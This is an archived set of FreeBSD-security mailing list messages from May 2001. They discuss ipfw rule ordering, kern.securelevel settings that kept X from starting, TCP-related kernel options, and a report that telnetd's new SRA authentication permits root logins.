<20010509200335.7680.cpmta@c000.sfo.cp.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Sharp wrote: > > expanding on what Noel Fitzpatrick said... > > If I do ipfw -f flush I still have rule 65535 deny ip from any to any The default rule. There is ALWAYS a rule 65535. > which allows NOTHING in or OUT. I can add DENY chains all day, but I cannot add any ALLOW chains unless I put in rule 65000 allow ip from any to any but this goes at the very top and is the first chain processed ( which allows ANYTHING in ) even if there are DENY chains below it. Uhhh... Hmmm? First, what are "chains?" Second, why can you not add pass ("allow") rules? What is preventing it? > SO, from /etc/rc.firewall I added IPFIREWALL_DEFAULT_TO_ACCEPT > to my kernel and recompiled > > In /etc/rc.conf, I have firewall_enable="YES" and firewall_type="open" > > and still I cannot get rid of that pesky 65535 DENY everything rule that wont let me do anything unless I add " ipfw add allow ip from any to any " which allows everything despite ANY DENY chains. Still really confused here. Having default deny is generally a Good Thing (tm) for a working firewall. Since you are specifying 'firewall_type="open"' you should get a '65000 pass any to any' rule. Now, if you want to deny specific traffic (the better way to generally go is explicitly allow what you want an deny all else by default), you just have to add 'deny' rules _before_ the '65000 pass any to any' rule. I am wondering if that is the problem here? The rules are processed in order with in a "match and out" manner. If you want a 'deny' rule to take effect before your default '65000 pass' rule, you need to stick it in _before_ rule 65000. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 13:49:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id C69C737B423 for ; Wed, 9 May 2001 13:49:19 -0700 (PDT) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id OAA08327; Wed, 9 May 2001 14:49:19 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id OAA17987; Wed, 9 May 2001 14:49:18 -0600 (MDT) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15097.44366.138725.618271@nomad.yogotech.com> Date: Wed, 9 May 2001 14:49:18 -0600 (MDT) To: Michael Sharp Cc: FreeBSD-security@FreeBSD.ORG Subject: Re: ipfw In-Reply-To: <20010509200335.7680.cpmta@c000.sfo.cp.net> References: <20010509200335.7680.cpmta@c000.sfo.cp.net> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ Try to wrap your lines at 80 chars. please ] > If I do ipfw -f flush I still have rule 65535 deny ip from any to any This is the default rule, and can't be removed. > which allows NOTHING in or OUT. I can add DENY chains all day, but I > cannot add any ALLOW chains unless I put in rule 65000 allow ip from > any to any but this goes at the very top and is the first chain > processed ( which allows ANYTHING in ) even if there are DENY chains > below it. Not true. Rules are processed in order, and if you don't give a rule number I don't know the order that a rule is inserted on the list. 'ipfw list' should show you the process order though. (BTW, what is this talk about 'ALLOW' and 'DENY' chains? I think you're mixing up the FreeBSD implementation with the Linux 'chains' implementation. FreeBSD's implementation is all rule based...) > In /etc/rc.conf, I have firewall_enable="YES" and firewall_type="open" > and still I cannot get rid of that pesky 65535 DENY everything rule > that wont let me do anything unless I add " ipfw add allow ip from any > to any " which allows everything despite ANY DENY chains. If the 'allow/dny' *RULE* is processed before the other rule, then it will take precedence. IPFW processes rules in order from start until it finds a match, and then finishes. If a rule doesn't match, then the next rule will be processed. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 14:59:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from nisser.com (c0039.upc-c.chello.nl [212.187.0.39]) by hub.freebsd.org (Postfix) with ESMTP id AE67C37B43C for ; Wed, 9 May 2001 14:59:08 -0700 (PDT) (envelope-from roelof@eboa.com) Received: from eboa.com (roelof [10.0.0.2]) by nisser.com (8.9.3/8.9.2) with ESMTP id XAA61512; Wed, 9 May 2001 23:59:05 +0200 (CEST) (envelope-from roelof@eboa.com) Message-ID: <3AF9BDA9.21F015A1@eboa.com> Date: Wed, 09 May 2001 23:59:05 +0200 From: Roelof Osinga Organization: eBOA - Programming the Web X-Mailer: Mozilla 4.77 [en] (Windows NT 5.0; U) X-Accept-Language: en,pdf MIME-Version: 1.0 To: Steve Peck Cc: security@FreeBSD.ORG Subject: Re: kernel security level References: <20010509200921.A65710@pavilion.net> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Steve Peck wrote: > > Hi, > > I've installed the FreeBSD 4.3 > > And I got this strange problem where the kern.sercurelevel was set to 1. > ... I'm currently upgrading the machines here (and there :) to 4.3 and: test:/root/cvsup$ uname -a FreeBSD test.nisser.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Wed May 9 19:36:00 CEST 2001 toor@test.nisser.com:/usr/obj/usr/src/sys/NISSER-02 i386 test:/root/cvsup$ sysctl kern.securelevel kern.securelevel: -1 test:/root/cvsup$ They don't seem to have that problem. Mind you, I did not go the GENERIC route. Instead I went straight to my kernel configuration. Maybe that makes a difference? Roelof -- _______________________________________________________________________ eBOA® est. 1982 http://eBOA.com/ tel. +31-58-2123014 mailto:info@eBOA.com?subject=Information_request fax. +31-58-2160293 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 15: 3:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from warp.belcom.net.ua (warp.belcom.net.ua [62.244.33.129]) by hub.freebsd.org (Postfix) with ESMTP id 5AC9637B422 for ; Wed, 9 May 2001 15:03:34 -0700 (PDT) (envelope-from say@belcom.net.ua) Received: from warp.belcom.net.ua (say@warp.belcom.net.ua [62.244.33.129]) by warp.belcom.net.ua (8.11.3/8.11.3) with ESMTP id f49M2d408801; Thu, 10 May 2001 01:02:52 +0300 (EEST) (envelope-from say@belcom.net.ua) Date: Thu, 10 May 2001 01:02:37 +0300 (EEST) From: Alexander Suvorov To: Michael Sharp Cc: FreeBSD-security@FreeBSD.ORG Subject: Re: Ip filtering with ipfw In-Reply-To: <20010509160500.7232.cpmta@c000.sfo.cp.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 9 May 2001, Michael Sharp wrote: > I am very new to FreeBSD, and have some questions about ipfw > I compiled: options IPFIREWALL > into my kernel, and added: firewall_enable="YES" in /etc/rc.conf > on reboot, I see ipfiltering initializing and the default policy is to deny. After reboot, I do: ipfw list and get this: > > 00100 allow ip from any to any via lo0 > 00200 deny ip from any to 127.0.0.0/8 > 00300 deny ip from 127.0.0.0/8 to any > 65000 allow ip from any to any > 65535 deny ip from any to any > > which I am assuming is the defaults. Now, to keep it simple, I have a router between my internal machine ( 192.168.1.3 ) and the Internet and I set the router to allow only port 113 in to 192.168.1.3 > > ifconfig reveals that my ethernet card is on x10 > > I added to ipfw: > > ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 in via x10 > ipfw add deny all from any to 192.168.1.3 0-1023 in via x10 > > 199.163.7.34 is the ip of a DALnet IRC server that checks identd > My thinking here was I only wanted 199.163.7.34 to get a identd responce on 113 and block all the others from getting a responce on 113. However, all the OTHER DALnet servers are getting a responce from 113 ( not just 199.163.7.34 ) and when I ran nmap from a friends box, it showed 113 open. > > What am I missing? First, if you want to pass only identd requests, you must specify a port in ipfw rule: ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 auth in via x10 Second, you can't use port-specific rules with 'all' protocol field. Instead use rules such as follows: ipfw add deny tcp from any to 192.168.1.3 0-1023 in via x10 ipfw add deny udp from any to 192.168.1.3 0-1023 in via x10 -- Alexander Suvorov say@belcom.net.ua Belcom ISP Belaya Tserkov, Ukraine To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 17:13:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from chalfont.mail.uk.easynet.net (chalfont.mail.uk.easynet.net [195.40.1.44]) by hub.freebsd.org (Postfix) with ESMTP id 1FA9437B423 for ; Wed, 9 May 2001 17:13:56 -0700 (PDT) (envelope-from steve@pavilion.net) Received: from mushroom.systems.pavilion.net (mushroom.systems.pavilion.net [212.74.1.186]) by chalfont.mail.uk.easynet.net (Postfix) with ESMTP id 195C0F81D5; Thu, 10 May 2001 01:12:16 +0100 (BST) Received: by mushroom.systems.pavilion.net (Postfix, from userid 1002) id A8AE213151; Thu, 10 May 2001 01:07:35 +0100 (BST) Date: Thu, 10 May 2001 01:07:35 +0100 From: Steve Peck To: Steve Peck Cc: security@FreeBSD.ORG Subject: Re: kernel security level Message-ID: <20010510010735.C67755@pavilion.net> References: <20010509200921.A65710@pavilion.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509200921.A65710@pavilion.net>; from steve.peck@uk.easynet.net on Wed, May 09, 2001 at 08:09:21PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, OK, I've got it all working now :-))) On Wed, May 09, 2001 at 08:09:21PM +0100, Steve Peck wrote: > Hi, > > I've installed the FreeBSD 4.3 > > And I got this strange problem where the kern.sercurelevel was set to 1. > > I had a version of 4.2 which just defaults to -1. > its set in /etc/rc.conf > Is this something new? > no > Although it seems like a good idea, I had much trouble finding out why > I couldn't run X windows. Soon as I found a reference to this /dev/mem > suddenly was permitted and X started up - but only as root :-(. > > I have since found that I can run X (as root) on kern.securelevel = 0 > But if I set it to this via /etc/sysctl.conf it just gets upgraded to > level 1! So, I now have it set to level -1 in /etc/sysctl.conf. > > If I did want to run at level 0 then I would have to upgrade it manually > By loggin in as root and doing > # sysctl - w kern.securelevel=0 > every reboot :-( > No - just set it in /etc/rc.conf ---see man init > Now, have I done something stangely bad during my install. > Yes - messed it all up in /stand/sysinstall > I just ftp'd it from the ftp.uk.FreeBSD.org site. > > If I try to startx as a user then I now get > > Fatal server error: > xf86OpeConsole:Server must be suid root > The server (in /etc/X11R6/bin) has to be chmod +s Thank you to the people who helped me. Cheers Steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 17:19:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from puzo.uol.com.br (puzo.uol.com.br [200.231.206.183]) by hub.freebsd.org (Postfix) with ESMTP id 1DE8737B423 for ; Wed, 9 May 2001 17:19:16 -0700 (PDT) (envelope-from tirloni@din.uem.br) Received: from 200191039106-dial-user-UOL.acessonet.com.br (200191039106-dial-user-UOL.acessonet.com.br [200.191.39.106]) by puzo.uol.com.br (8.9.1/8.9.1) with ESMTP id VAA14144; Wed, 9 May 2001 21:17:32 -0300 (BRT) Date: Wed, 9 May 2001 06:53:24 -0300 (BRT) From: Giovanni Picoli Tirloni X-X-Sender: To: Steve Peck Cc: Subject: Re: kernel security level In-Reply-To: <20010509200921.A65710@pavilion.net> Message-ID: <20010509064729.P517-100000@mink.ath.cx> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 May 2001, Steve Peck wrote: > Hi, > > I've installed the FreeBSD 4.3 > > And I got this strange problem where the kern.sercurelevel was set to 1. > > I had a version of 4.2 which just defaults to -1. > > Is this something new? > > Although it seems like a good idea, I had much trouble finding out why > I couldn't run X windows. Soon as I found a reference to this /dev/mem > suddenly was permitted and X started up - but only as root :-(. > > I have since found that I can run X (as root) on kern.securelevel = 0 > But if I set it to this via /etc/sysctl.conf it just gets upgraded to > level 1! So, I now have it set to level -1 in /etc/sysctl.conf. > > If I did want to run at level 0 then I would have to upgrade it manually > By loggin in as root and doing > # sysctl - w kern.securelevel=0 > every reboot :-( > > Now, have I done something stangely bad during my install. > > I just ftp'd it from the ftp.uk.FreeBSD.org site. > > If I try to startx as a user then I now get > > Fatal server error: > xf86OpeConsole:Server must be suid root > > Hmmmm, anyone got any ideas? Check your /etc/rc.conf, there must be these lines there: kern_securelevel_enable="YES" kern_securelevel="1" You don't need to change kern.securelevel yourself, the /etc/rc script does it for you at boot time already. So take those lines out of your sysctl.conf and just set the proper secure level in /etc/rc.conf or disable it at all. You must have chosen the medium security profile (or whatever sets the secure level to 1) while installing FreeBSD. G'luck -- Giovanni Picoli Tirloni tirloni@din.uem.br To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 10 2: 9:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 8229237B423 for ; Thu, 10 May 2001 02:09:20 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA64594; Thu, 10 May 2001 11:09:07 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Retal" Cc: Subject: Re: Some Kernel options References: <002601ba1df7$4da07940$b88f39d5@a> From: Dag-Erling Smorgrav Date: 10 May 2001 11:09:06 +0200 In-Reply-To: <002601ba1df7$4da07940$b88f39d5@a> Message-ID: Lines: 27 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Retal" writes: > options KBD_INSTALL_CDEV # install a CDEV entry in /dev This option has no (visible) effect unless you use a USB keyboard. > options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN This option has no effect unless you set tcp_drop_synfin="YES" in /etc/rc.conf. > options TCP_RESTRICT_RST #restrict emission of TCP RST Don't. Use blackhole(4) instead. > options ICMP_BANDLIM This option has an easily demonstrable effect: try running 'nmap -sS' against your machine. > BTW: if i add TCP_DROP_SYNFIN, it should effect setup option in my > firewall ?if it is, how ? See the rc.conf(5) man page. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 10 2:13:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id A5C3937B423 for ; Thu, 10 May 2001 02:13:49 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA64606; Thu, 10 May 2001 11:13:40 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: nate@yogotech.com (Nate Williams) Cc: Michael Sharp , FreeBSD-security@FreeBSD.ORG Subject: Re: Ip filtering with ipfw References: <20010509160500.7232.cpmta@c000.sfo.cp.net> <15097.44134.876784.259823@nomad.yogotech.com> From: Dag-Erling Smorgrav Date: 10 May 2001 11:13:39 +0200 In-Reply-To: <15097.44134.876784.259823@nomad.yogotech.com> Message-ID: Lines: 17 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams writes: > This is the default 'open' setup, yes, and happens because you added the > following (mentioned in another email). > > > SO, from /etc/rc.firewall I added IPFIREWALL_DEFAULT_TO_ACCEPT to my > > kernel and recompiled. > > Otherwise, rule 65000 wouldn't have existed. Wrong. The ruleset above is from a machine that doesn't have IPFIREWALL_DEFAULT_TO_ACCEPT, otherwise rule 65535 would be "allow ip from any to any" instead of "deny ip from any to any". Rule 65000 was added by /etc/rc.firewall, which knows nothing about kernel options. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 10 2:18:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 1278537B423 for ; Thu, 10 May 2001 02:18:29 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA64646; Thu, 10 May 2001 11:18:24 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: nate@yogotech.com (Nate Williams) Cc: Michael Sharp , FreeBSD-security@FreeBSD.ORG Subject: Re: ipfw References: <20010509200335.7680.cpmta@c000.sfo.cp.net> <15097.44366.138725.618271@nomad.yogotech.com> From: Dag-Erling Smorgrav Date: 10 May 2001 11:18:23 +0200 In-Reply-To: <15097.44366.138725.618271@nomad.yogotech.com> Message-ID: Lines: 10 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams writes: > Not true. Rules are processed in order, and if you don't give a rule > number I don't know the order that a rule is inserted on the list. The new rule is inserted at highest existing rule number (except 65535) + 100. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 10 2:22:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id D615137B423 for ; Thu, 10 May 2001 02:22:18 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA64668; Thu, 10 May 2001 11:22:16 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Michael Sharp Cc: FreeBSD-security@FreeBSD.ORG Subject: Re: ipfw References: <20010509201853.6521.cpmta@c000.sfo.cp.net> From: Dag-Erling Smorgrav Date: 10 May 2001 11:22:14 +0200 In-Reply-To: <20010509201853.6521.cpmta@c000.sfo.cp.net> Message-ID: Lines: 16 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Sharp writes: > But I need to block port 113, and allow 1 machine to get to port > 113. HAVING to add ipfw add allow ip from any to any gets process > before I would allow my 1 machine to port 113, thus allowing every > machine to port 113 How about this: go read the ipfw(8) from top to bottom, paying particular attention to the EXAMPLES section; then browse /etc/rc.firewall. Having read this material, if you still don't understand how ipfw works, feel free to ask questions on the -questions mailing list. The -security list is for security issues, not for "can't be bothered to read the docs" issues. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 10 9:39:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 8131537B422 for ; Thu, 10 May 2001 09:39:15 -0700 (PDT) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id KAA27126; Thu, 10 May 2001 10:39:07 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id KAA21302; Thu, 10 May 2001 10:39:07 -0600 (MDT) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15098.50218.467751.103251@nomad.yogotech.com> Date: Thu, 10 May 2001 10:39:06 -0600 (MDT) To: Dag-Erling Smorgrav Cc: nate@yogotech.com (Nate Williams), Michael Sharp , FreeBSD-security@FreeBSD.ORG Subject: Re: ipfw In-Reply-To: References: <20010509200335.7680.cpmta@c000.sfo.cp.net> <15097.44366.138725.618271@nomad.yogotech.com> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Not true. Rules are processed in order, and if you don't give a rule > > number I don't know the order that a rule is inserted on the list. > > The new rule is inserted at highest existing rule number (except > 65535) + 100. Ahh, this explains why the new rules aren't being seen (because of rule 65000). I would have thought the rules would have been added to the 'top' of the ruleset. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 10 9:51:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id AA31F37B422 for ; Thu, 10 May 2001 09:51:39 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 59052 invoked by uid 1000); 10 May 2001 16:51:05 -0000 Date: Thu, 10 May 2001 19:51:05 +0300 From: Peter Pentchev To: Nate Williams Cc: Dag-Erling Smorgrav , Michael Sharp , FreeBSD-security@FreeBSD.ORG Subject: Re: ipfw Message-ID: <20010510195105.D56859@ringworld.oblivion.bg> Mail-Followup-To: Nate Williams , Dag-Erling Smorgrav , Michael Sharp , FreeBSD-security@FreeBSD.ORG References: <20010509200335.7680.cpmta@c000.sfo.cp.net> <15097.44366.138725.618271@nomad.yogotech.com> <15098.50218.467751.103251@nomad.yogotech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <15098.50218.467751.103251@nomad.yogotech.com>; from nate@yogotech.com on Thu, May 10, 2001 at 10:39:06AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, May 10, 2001 at 10:39:06AM -0600, Nate Williams wrote: > > > Not true. Rules are processed in order, and if you don't give a rule > > > number I don't know the order that a rule is inserted on the list. > > > > The new rule is inserted at highest existing rule number (except > > 65535) + 100. > > Ahh, this explains why the new rules aren't being seen (because of rule > 65000). > > I would have thought the rules would have been added to the 'top' of the > ruleset. Nope, they're added to the bottom, so that if you add several rules one by one, they'll be executed in the order you added them. G'luck, Peter -- This would easier understand fewer had omitted. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 10 17:47:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail4.enter.net (mail4.enter.net [63.65.0.24]) by hub.freebsd.org (Postfix) with ESMTP id AFFEB37B422 for ; Thu, 10 May 2001 17:47:32 -0700 (PDT) (envelope-from dh@enter.net) Received: from enter.net (bsder.enter.net [63.94.128.138]) by mail4.enter.net (8.11.2/8.11.2) with ESMTP id f4B0xx797055 for ; Thu, 10 May 2001 20:59:59 -0400 (EDT) Message-ID: <3AFB369D.5574182A@enter.net> Date: Thu, 10 May 2001 20:47:25 -0400 From: Daniel Hauer X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.4.0-11mdk i586) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello all, After installing 4.3 release on one machine and upgrading 2 other machines to -STABLE, I noticed there is a new mechanism used in telnetd, namely this "SRA" authentication mechanism. While convienient, (you don't have to type your username) I found something VERY disturbing: If you are at a root prompt on any other BSD based machine, you can just telnet to the 4.3 machines, and login right in with the root username and password! This only apparently occurs from a BSD based machine, as Myself and a co-worker tried it from 2 different distribution Linux boxes, and we could not login as root. None of the switches for telnetd in the inetd.conf worked to our satisfaction, and after reading the sources, we recompiled telnetd with AUTHENTICATION=NO to disable this behavior. What is this "SRA authentication" ? And why is telnetd's default behavior to allow root logins at all? I realize that any self respecting sysadmin will either use ipfirewall, ipfilter, or good old inetd's hosts.allow file to limit telnet logins anyway, but the question still remains.... Why? Wouldn't this SRA with a "no root" login be a better idea? -- Regards, Daniel Hauer Network Administration http://www.enter.net "The Road To The Internet Starts There!" *************************************************************************** Windoze is for GAMES, UNIX is for the rest of us. UNIX is like the sights on a loaded gun. If you aim the gun at your foot and pull the trigger, it is the basic function of UNIX to accurately deliver the bullet from the gun to the target. In this case, it's your foot. *************************************************************************** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 10 21: 9:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 04EE737B422 for ; Thu, 10 May 2001 21:09:12 -0700 (PDT) (envelope-from mike@sentex.net) Received: from chimp (cage.simianscience.com [64.7.134.1]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f4B49AV00304 for ; Fri, 11 May 2001 00:09:11 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010511000303.036916f8@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Fri, 11 May 2001 00:09:09 -0400 To: security@freebsd.org From: Mike Tancsa Subject: preventing direct root login on telnetd Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a way to prevent root from logging in directly on STABLE via telnet ? ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 10 23: 0:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from gobbe.net (gobbe.net [212.83.113.102]) by hub.freebsd.org (Postfix) with ESMTP id 0A66937B423 for ; Thu, 10 May 2001 23:00:43 -0700 (PDT) (envelope-from gobbe@gobbe.net) Received: from localhost (gobbe@localhost) by gobbe.net (8.9.3/8.9.3) with ESMTP id IAA03746; Fri, 11 May 2001 08:57:15 +0300 (EEST) (envelope-from gobbe@gobbe.net) Date: Fri, 11 May 2001 08:57:15 +0300 (EEST) From: Jussi Jaurola To: Mike Tancsa Cc: security@FreeBSD.ORG Subject: Re: preventing direct root login on telnetd In-Reply-To: <4.2.2.20010511000303.036916f8@192.168.0.12> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Use /etc/hosts.allow. But I think that telnet protocol is so crappy that use ssh instead? -- Jussi P. Jaurola Network Security Engineer gobbe@gobbe.net Netello Systems, Ltd. http://gobbe.net +358 50 566 9183 On Fri, 11 May 2001, Mike Tancsa wrote: > > Is there a way to prevent root from logging in directly on STABLE via telnet ? > > ---Mike > -------------------------------------------------------------------- > Mike Tancsa, tel +1 519 651 3400 > Network Administration, mike@sentex.net > Sentex Communications www.sentex.net > Cambridge, Ontario Canada www.sentex.net/mike > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 10 23:36:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from public.guangzhou.gd.cn (mail1-smtp.guangzhou.gd.cn [202.105.65.221]) by hub.freebsd.org (Postfix) with SMTP id CAC3537B423 for ; Thu, 10 May 2001 23:36:21 -0700 (PDT) (envelope-from huacheng@public.guangzhou.gd.cn) Received: from rep1([61.140.208.60]) by public.guangzhou.gd.cn(JetMail 2.5.3.0) with SMTP id jm43afbc9b4; Fri, 11 May 2001 06:34:29 -0000 Message-ID: <004b01c0d9e4$a3bb35e0$5801a8c0@suntop.com> From: "edwin chan" To: Subject: I expect a answer about SRA Date: Fri, 11 May 2001 14:35:58 +0800 MIME-Version: 1.0 